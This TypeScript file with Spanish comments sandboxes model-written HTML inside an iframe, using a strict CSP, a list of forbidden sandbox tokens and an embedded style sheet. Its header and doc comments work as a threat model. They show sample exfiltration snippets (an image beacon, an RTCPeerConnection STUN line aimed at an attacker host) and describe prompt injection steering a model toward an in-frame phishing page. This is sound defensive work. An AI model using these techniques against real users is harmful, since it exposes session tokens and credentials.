// Construcción del documento que se dibuja dentro del `<iframe srcdoc>` de una
// respuesta gráfica, y la base de estilos de Atlas que lo acompaña.
//
// TODO lo de este archivo es lógica PURA (strings): es la pieza con riesgo de
// seguridad del feature y por eso está separada de React y testeada entera en
// `documentoGrafico.test.ts`.
//
// ╔══════════════════════════════════════════════════════════════════════════╗
// ║  POR QUÉ ESTO ES ASÍ — NO LO "SIMPLIFIQUES"                              ║
// ╠══════════════════════════════════════════════════════════════════════════╣
// ║                                                                          ║
// ║  El HTML que se dibuja acá lo ESCRIBE UN MODELO. No es contenido de      ║
// ║  Atlas, no pasó por code review y puede venir influido por lo que el     ║
// ║  usuario pegó en el chat, por una web que el agente scrapeó o por una    ║
// ║  búsqueda web (prompt injection). Tratalo como HTML de un desconocido.   ║
// ║                                                                          ║
// ║  1) NUNCA con `dangerouslySetInnerHTML` ni `innerHTML`.                  ║
// ║     Eso lo mete en el DOM de la app, en el ORIGEN de la app. Un          ║
// ║     `<img src=x onerror=...>` alcanza para correr JS con los permisos    ║
// ║     de Atlas: puede leer `localStorage`, donde vive el token de sesión   ║
// ║     de Supabase (`sb-<ref>-auth-token`), y mandarlo a donde quiera. Ese  ║
// ║     token es la cuenta entera del usuario.                               ║
// ║                                                                          ║
// ║  2) NUNCA `sandbox="allow-scripts allow-same-origin"`.                   ║
// ║     ES EL ERROR CLÁSICO Y ANULA TODO EL AISLAMIENTO. Con las dos juntas  ║
// ║     el documento del iframe corre EN EL ORIGEN DE ATLAS: vuelve a ver    ║
// ║     `localStorage`/`sessionStorage`/cookies y, de yapa, puede hacer      ║
// ║     `frameElement.removeAttribute('sandbox')` y recargarse SIN sandbox.  ║
// ║     Por eso el único token permitido es `allow-scripts` (ver             ║
// ║     `SANDBOX_GRAFICO`) y hay un test que lo verifica carácter a          ║
// ║     carácter. Sin `allow-same-origin` el documento vive en un ORIGEN     ║
// ║     OPACO ("null"): no hay storage, no hay cookies, no puede leer nada   ║
// ║     de la ventana de arriba.                                             ║
// ║                                                                          ║
// ║  3) Sin `allow-top-navigation`, `allow-popups`, `allow-forms` ni         ║
// ║     `allow-modals`: no puede llevarse la pestaña del usuario a otro      ║
// ║     lado, ni abrir ventanas, ni mandar un `<form>` a un servidor, ni     ║
// ║     tapar la pantalla con un `alert()`.                                  ║
// ║                                                                          ║
// ║  4) La CSP de `META_CSP` va DENTRO del propio documento y es la segunda  ║
// ║     capa: aunque el modelo escriba scripts (tiene `allow-scripts`), las  ║
// ║     salidas de red del documento están cerradas. `default-src 'none'` +  ║
// ║     `connect-src 'none'` matan `fetch`/`XHR`/`WebSocket`/`sendBeacon`;   ║
// ║     `img-src data:` mata el clásico `new Image().src =                   ║
// ║     'https://malo/?' + robo`; `font-src 'none'` mata las fuentes         ║
// ║     remotas; `form-action 'none'` y `base-uri 'none'` matan el           ║
// ║     exfiltrado por formulario o por `<base>`; y `webrtc 'block'` cierra  ║
// ║     el canal que NINGUNA de las otras cubre (ver la nota de              ║
// ║     `DIRECTIVAS_CSP`). Va primero de todo en el `<head>`, antes que nada ║
// ║     del modelo, que es lo único que garantiza que aplique al documento   ║
// ║     completo.                                                            ║
// ║                                                                          ║
// ║  ── RIESGO RESIDUAL: PHISHING DENTRO DEL MARCO ────────────────────────  ║
// ║  Un `<a>` o un `location.href` pueden navegar el PROPIO iframe a una     ║
// ║  URL remota. Ninguna CSP lo frena (`navigate-to` nunca se implementó,    ║
// ║  `frame-src` es para marcos ANIDADOS y `form-action` sólo cubre          ║
// ║  submits), y el documento que llega DESPUÉS ya no trae nuestra `<meta>`: ║
// ║  tiene la red entera a disposición.                                      ║
// ║                                                                          ║
// ║  Lo que ese documento NO puede hacer sigue siendo mucho: hereda el       ║
// ║  sandbox, así que vive en origen opaco y no ve el token, ni las          ║
// ║  cookies, ni la ventana de arriba, ni puede mandar un `<form>` ni        ║
// ║  llevarse la pestaña.                                                    ║
// ║                                                                          ║
// ║  PERO NO ES "no filtra nada", como decía este comentario antes: lo que   ║
// ║  se filtra no es lo que había adentro del marco, es LO QUE EL USUARIO    ║
// ║  TIPEE DESPUÉS. La página remota puede pintarse como "tu sesión de       ║
// ║  Atlas expiró, ingresá tu mail y contraseña", leer las teclas con JS y   ║
// ║  mandarlas por `fetch` — y todo eso ocurre adentro de un panel con el    ║
// ║  header de Atlas y con app.estudio-atlas.com en la barra de             ║
// ║  direcciones. Con la búsqueda web prendida por defecto, el disparador    ║
// ║  puede ser una prompt injection.                                         ║
// ║                                                                          ║
// ║  MITIGACIÓN: `VisorGrafico` cuenta los eventos `load` del elemento       ║
// ║  iframe. El `srcdoc` dispara uno; cualquier navegación posterior         ║
// ║  dispara otro, y ahí el visor tira el marco abajo y muestra un aviso.    ║
// ║  No es una barrera criptográfica —el usuario puede volver a mostrarlo—   ║
// ║  pero corta el engaño en el momento en que empieza. La otra mitad sería  ║
// ║  una CSP real de la app con `frame-src` acotado (esa SÍ se aplica a      ║
// ║  cada navegación del marco hijo); hoy la app no publica ninguna.         ║
// ║                                                                          ║
// ║  La alternativa de sanitizar el HTML a mano es justamente lo que el      ║
// ║  iframe evita: una lista negra de tags con la que siempre se pierde.     ║
// ╚══════════════════════════════════════════════════════════════════════════╝

/**
 * El ÚNICO valor válido para el atributo `sandbox` del iframe.
 *
 * Es una constante y no un literal suelto en el JSX para que el test pueda
 * afirmar sobre ella y para que agregar un token sea un cambio visible en el
 * diff. Si algún día alguien "necesita" `allow-same-origin`, la respuesta es
 * NO: ver el bloque de arriba, punto 2.
 */
export const SANDBOX_GRAFICO = 'allow-scripts';

/** Tokens de `sandbox` que jamás pueden aparecer, con el motivo. Los usa el
 *  test para fallar con un mensaje que se entienda. */
export const SANDBOX_PROHIBIDOS = [
  'allow-same-origin',
  'allow-top-navigation',
  'allow-top-navigation-by-user-activation',
  'allow-popups',
  'allow-popups-to-escape-sandbox',
  'allow-forms',
  'allow-modals',
  'allow-downloads',
  'allow-pointer-lock',
  'allow-presentation',
  'allow-storage-access-by-user-activation',
] as const;

/**
 * Directivas de la CSP del documento del iframe, una por línea para que se lea
 * y se pueda testear de a una.
 *
 * `default-src 'none'` es la base: todo lo que no se habilite explícitamente
 * abajo está prohibido. Solo se abren dos cosas, y ninguna toca la red:
 *  - `style-src 'unsafe-inline'`: la hoja base de Atlas es un `<style>` y el
 *    modelo escribe `style="..."` en los elementos. Sin esto no hay diseño.
 *  - `script-src 'unsafe-inline'`: coherente con `allow-scripts` del sandbox
 *    (un gráfico puede querer una interacción mínima). Sin fuente de host: un
 *    `<script src="https://...">` está bloqueado igual.
 *  - `img-src data:`: SOLO data-URIs (un SVG embebido). NO hay `https:`, así
 *    que una imagen no puede usarse como canal de salida.
 *
 * `webrtc 'block'` MERECE SU PROPIO PÁRRAFO porque es el único agujero que
 * `default-src 'none'` NO tapa: `RTCPeerConnection` no cae bajo ninguna de las
 * directivas de fetch, así que con `allow-scripts` prendido un
 * `new RTCPeerConnection({iceServers:[{urls:'stun:'+datos+'.atacante.example'}]})`
 * sacaba datos por el DNS del ICE gathering aunque `connect-src` fuera `'none'`.
 * Y el documento no está vacío de datos sensibles: el modelo llega acá con la
 * marca, el rubro y el público objetivo del usuario en su contexto. Por eso la
 * directiva está, aunque hoy sólo la implemente Chromium: cierra el canal donde
 * se puede y no rompe nada donde no.
 *
 * NO se incluyen `frame-ancestors` ni `sandbox`: los navegadores IGNORAN esas
 * dos cuando la CSP llega por `<meta>` (solo valen como header HTTP) y dejarlas
 * escritas haría creer que protegen algo. El encuadre y el sandbox los pone el
 * elemento `<iframe>` del padre, que es donde sí mandan. `webrtc`, en cambio,
 * NO está en esa lista de ignoradas: por `<meta>` se aplica.
 */
export const DIRECTIVAS_CSP = [
  "default-src 'none'",
  "script-src 'unsafe-inline'",
  "style-src 'unsafe-inline'",
  'img-src data:',
  "font-src 'none'",
  "connect-src 'none'",
  "media-src 'none'",
  "object-src 'none'",
  "frame-src 'none'",
  "child-src 'none'",
  "worker-src 'none'",
  "manifest-src 'none'",
  "form-action 'none'",
  "base-uri 'none'",
  // El canal que las de arriba no cubren: ver la nota del bloque de doc.
  "webrtc 'block'",
] as const;

export const CSP_GRAFICO = DIRECTIVAS_CSP.join('; ');

/** La etiqueta `<meta>` completa. Va SIEMPRE primera en el `<head>`. */
export const META_CSP = `<meta http-equiv="Content-Security-Policy" content="${CSP_GRAFICO}">`;

// ── La base de estilos de Atlas ───────────────────────────────────────────
//
// El iframe está aislado: NO hereda ni una línea del CSS de la app (ni Tailwind,
// ni las variables `--brand-*` de `index.css`). Si no le mandamos nada, el
// modelo dibuja Times New Roman sobre blanco y no parece Atlas. Así que la hoja
// viaja EMBEBIDA con el documento, y las clases que define están listadas en
// `GUIA_ESTILOS_PARA_MODELO`, que se le pasa al modelo en la descripción de la
// herramienta: una sola fuente de verdad, y un test verifica que no se
// desincronicen.
//
// La tipografía es el stack del sistema a propósito: la fuente de la app
// (Plus Jakarta Sans) se carga con `@font-face` desde `/fonts/...`, y desde un
// origen opaco eso es una petición de red — bloqueada por `font-src 'none'`,
// que es exactamente lo que queremos. Mejor system-ui, que se ve bien y no
// pide nada, que un fallback feo después de un timeout.

export const ESTILOS_BASE_GRAFICO = `
:root{
  color-scheme:light;
  --atlas-primario:#1644EB;
  --atlas-profundo:#01269B;
  --atlas-acento:#60E7F0;
  --atlas-negro:#02062B;
  --atlas-superficie:#F0F2F7;
  --atlas-blanco:#FFFFFF;
  --atlas-borde:rgba(2,6,43,.09);
  --atlas-texto:#02062B;
  --atlas-texto-suave:rgba(2,6,43,.55);
  --atlas-radio-sm:8px;
  --atlas-radio-md:12px;
  --atlas-radio-lg:16px;
  --atlas-serie:var(--atlas-primario);
}
*,*::before,*::after{box-sizing:border-box}
html{-webkit-text-size-adjust:100%}
body{
  margin:0;
  padding:18px;
  font-family:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif;
  font-size:14px;
  line-height:1.5;
  color:var(--atlas-texto);
  background:var(--atlas-blanco);
  -webkit-font-smoothing:antialiased;
  overflow-x:hidden;
}
img,svg,table{max-width:100%}
/* Cualquier ancho fijo que se le escape al modelo se recorta acá y no rompe
   el layout del panel. */
.atlas-doc{display:flex;flex-direction:column;gap:16px;max-width:100%;overflow-wrap:anywhere}
.atlas-doc>*{min-width:0}

/* Texto */
.atlas-titulo{margin:0;font-size:17px;font-weight:600;letter-spacing:-.01em;color:var(--atlas-negro)}
.atlas-subtitulo{margin:0;font-size:13.5px;font-weight:500;color:var(--atlas-texto-suave)}
.atlas-nota{margin:0;font-size:12px;color:var(--atlas-texto-suave)}

/* Contenedores */
.atlas-tarjeta{
  background:var(--atlas-blanco);
  border:1px solid var(--atlas-borde);
  border-radius:var(--atlas-radio-lg);
  padding:14px;
  display:flex;flex-direction:column;gap:10px;
}
.atlas-grid{display:grid;grid-template-columns:repeat(auto-fit,minmax(150px,1fr));gap:10px}
.atlas-fila{display:flex;flex-wrap:wrap;align-items:center;gap:8px}

/* KPI */
.atlas-kpi{
  background:var(--atlas-superficie);
  border-radius:var(--atlas-radio-lg);
  padding:14px;
  display:flex;flex-direction:column;gap:2px;
}
.atlas-kpi-valor{font-size:22px;font-weight:600;letter-spacing:-.02em;color:var(--atlas-negro)}
.atlas-kpi-etiqueta{font-size:12px;font-weight:500;color:var(--atlas-texto-suave)}
.atlas-kpi-delta{font-size:12px;font-weight:600;color:var(--atlas-texto-suave)}
.atlas-delta-sube{color:#0F7B4F}
.atlas-delta-baja{color:#B4402C}

/* Tabla */
.atlas-tabla{width:100%;border-collapse:collapse;font-size:13.5px}
.atlas-tabla th{
  text-align:left;font-weight:600;font-size:12px;letter-spacing:.02em;text-transform:uppercase;
  color:var(--atlas-texto-suave);padding:8px 10px;border-bottom:1px solid var(--atlas-borde);
}
.atlas-tabla td{padding:9px 10px;border-bottom:1px solid var(--atlas-borde);vertical-align:top}
.atlas-tabla tr:last-child td{border-bottom:0}
.atlas-tabla td:not(:first-child),.atlas-tabla th:not(:first-child){text-align:right}

/* Barras horizontales (comparación) */
.atlas-barras{display:flex;flex-direction:column;gap:9px}
.atlas-barra{display:grid;grid-template-columns:minmax(72px,26%) 1fr auto;align-items:center;gap:10px}
.atlas-barra-etiqueta{font-size:13px;color:var(--atlas-texto);overflow-wrap:anywhere}
.atlas-barra-pista{background:var(--atlas-superficie);border-radius:999px;height:10px;overflow:hidden}
.atlas-barra-relleno{background:var(--atlas-serie);border-radius:999px;height:100%;min-width:3px}
.atlas-barra-valor{font-size:13px;font-weight:600;color:var(--atlas-negro);font-variant-numeric:tabular-nums}

/* Columnas verticales (evolución en el tiempo) */
.atlas-columnas{display:flex;align-items:flex-end;gap:8px;min-height:150px}
.atlas-columna{flex:1;display:flex;flex-direction:column;align-items:center;gap:6px;min-width:0}
.atlas-columna-valor{font-size:12px;font-weight:600;color:var(--atlas-negro);font-variant-numeric:tabular-nums}
.atlas-columna-pista{width:100%;height:120px;display:flex;align-items:flex-end;background:var(--atlas-superficie);border-radius:var(--atlas-radio-sm)}
.atlas-columna-relleno{width:100%;background:var(--atlas-serie);border-radius:var(--atlas-radio-sm);min-height:3px}
.atlas-columna-etiqueta{font-size:11.5px;color:var(--atlas-texto-suave);text-align:center;overflow-wrap:anywhere}

/* Chips y listas */
.atlas-chip{display:inline-flex;align-items:center;gap:6px;background:var(--atlas-superficie);color:var(--atlas-negro);border-radius:999px;padding:5px 10px;font-size:12px;font-weight:500}
.atlas-chip-acento{background:rgba(96,231,240,.28);color:var(--atlas-profundo)}
.atlas-lista{margin:0;padding-left:18px;display:flex;flex-direction:column;gap:6px;font-size:13.5px}
.atlas-lista::marker,.atlas-lista li::marker{color:var(--atlas-primario)}

/* Leyenda */
.atlas-leyenda{display:flex;flex-wrap:wrap;gap:12px;font-size:12px;color:var(--atlas-texto-suave)}
.atlas-leyenda-item{display:inline-flex;align-items:center;gap:6px}
.atlas-punto{width:9px;height:9px;border-radius:999px;background:var(--atlas-serie);flex:none}

/* Paleta de series. Poner la clase en el contenedor (o en el propio elemento)
   pinta todo lo que lea \`--atlas-serie\`: relleno de barra, columna y punto. */
.atlas-serie-1{--atlas-serie:#1644EB}
.atlas-serie-2{--atlas-serie:#01269B}
.atlas-serie-3{--atlas-serie:#60E7F0}
.atlas-serie-4{--atlas-serie:#6E8BF3}
.atlas-serie-5{--atlas-serie:#AFC0F7}

@media (max-width:520px){
  body{padding:14px;font-size:13.5px}
  .atlas-barra{grid-template-columns:1fr auto;row-gap:4px}
  .atlas-barra-pista{grid-column:1 / -1}
}
`.trim();

/**
 * Lo que se le cuenta al modelo sobre la base de estilos, palabra por palabra
 * como va en la descripción de la herramienta (`herramientasChatAtlas.ts`).
 *
 * Está acá y no allá porque describe ESTA hoja: si alguien agrega o renombra
 * una clase, el archivo a tocar es uno solo. `documentoGrafico.test.ts`
 * verifica que cada clase nombrada acá exista de verdad en
 * `ESTILOS_BASE_GRAFICO` — sin eso el modelo termina usando clases fantasma y
 * el gráfico sale sin estilo.
 */
export const GUIA_ESTILOS_PARA_MODELO = [
  'Se dibuja dentro de un marco aislado con una hoja de estilos de Atlas YA CARGADA. USÁ ESAS CLASES en vez de inventar tu propia estética (podés sumar `style="..."` inline para medidas puntuales, como el ancho de una barra).',
  'Envolvé todo en `<div class="atlas-doc">`.',
  'Texto: `atlas-titulo`, `atlas-subtitulo`, `atlas-nota`.',
  'Bloques: `atlas-tarjeta` (tarjeta blanca con borde), `atlas-grid` (grilla que se acomoda sola), `atlas-fila` (fila que envuelve).',
  'Números grandes: `atlas-kpi` con `atlas-kpi-valor`, `atlas-kpi-etiqueta` y opcional `atlas-kpi-delta` (+ `atlas-delta-sube` o `atlas-delta-baja`).',
  'Tabla: `<table class="atlas-tabla">` con `<thead>`/`<tbody>`.',
  'Barras horizontales (comparar ítems): `atlas-barras` > `atlas-barra` > `atlas-barra-etiqueta` + `atlas-barra-pista` > `atlas-barra-relleno` (ancho con `style="width:72%"`) + `atlas-barra-valor`.',
  'Columnas verticales (evolución en el tiempo): `atlas-columnas` > `atlas-columna` > `atlas-columna-valor` + `atlas-columna-pista` > `atlas-columna-relleno` (alto con `style="height:64%"`) + `atlas-columna-etiqueta`.',
  'Otros: `atlas-chip` (+ `atlas-chip-acento`), `atlas-lista` sobre un `<ul>`, y `atlas-leyenda` > `atlas-leyenda-item` > `atlas-punto`.',
  'Colores: poné `atlas-serie-1` … `atlas-serie-5` en el contenedor para teñir barras, columnas y puntos con la paleta de la marca. Las variables `--atlas-primario` (#1644EB), `--atlas-profundo` (#01269B), `--atlas-acento` (#60E7F0), `--atlas-negro` (#02062B), `--atlas-superficie` (#F0F2F7) están disponibles.',
  'PROHIBIDO porque el marco lo bloquea y se ve roto: imágenes o fuentes remotas, `<img src="http...">`, `fetch`/`XMLHttpRequest`, `<iframe>`, `<form>`, `<base>` y cualquier CDN. Todo tiene que ser autocontenido.',
  'Nada de anchos fijos en px ni de `position:fixed`: el marco es angosto y responsive. Escribí siempre el valor numérico como texto además de dibujarlo (una barra sin número no se entiende).',
].join(' ');

// ── El documento ──────────────────────────────────────────────────────────

/**
 * Arma el documento completo que va en `srcdoc`.
 *
 * ORDEN, QUE NO ES CASUAL: `<!doctype>` → `<head>` con la CSP PRIMERA, después
 * el charset, el viewport y la hoja de Atlas → `<body>` con el HTML del modelo
 * dentro de un contenedor. El HTML del modelo entra AL FINAL y SOLO en el
 * `<body>`: cuando el parser llega a él la CSP ya está aplicada al documento y
 * nada de lo que escriba puede aflojarla (una segunda CSP solo puede restringir
 * más, nunca menos).
 *
 * NO se sanitiza ni se escapa el HTML del modelo, y está bien: escaparlo lo
 * mostraría como texto en vez de dibujarlo, y sanitizarlo sería mantener una
 * lista negra de tags — el juego que siempre se pierde. La contención la da el
 * iframe (`SANDBOX_GRAFICO` + esta CSP), no una limpieza de strings.
 */
export function construirDocumentoGrafico(htmlDelModelo: string): string {
  const cuerpo = typeof htmlDelModelo === 'string' ? htmlDelModelo : '';
  return [
    '<!doctype html>',
    '<html lang="es">',
    '<head>',
    META_CSP,
    '<meta charset="utf-8">',
    '<meta name="viewport" content="width=device-width, initial-scale=1">',
    `<style>${ESTILOS_BASE_GRAFICO}</style>`,
    '</head>',
    '<body>',
    '<div class="atlas-doc">',
    cuerpo,
    '</div>',
    '</body>',
    '</html>',
  ].join('\n');
}
